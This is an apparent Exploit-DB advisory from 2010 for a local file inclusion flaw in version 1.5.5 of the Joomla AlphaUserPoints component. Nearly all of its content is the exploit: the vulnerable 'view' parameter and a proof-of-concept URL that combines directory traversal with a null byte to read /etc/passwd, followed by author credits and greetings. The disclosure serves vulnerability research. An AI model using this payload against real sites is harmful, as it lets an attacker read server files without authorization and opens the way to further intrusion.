Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion

EDB-ID:

12150




Platform:

PHP

Date:

2010-04-11


===============================================================================================================


  [o] Joomla Component AlphaUserPoints Local File Inclusion Vulnerability
 
       Software : com_alphauserpoints version 1.5.5
       Vendor   : http://www.alphaplug.com/
       Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


===============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_alphauserpoints&view=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00


===============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


===============================================================================================================


  [o] April 11 2010 - GMT +07:00 Jakarta, Indonesia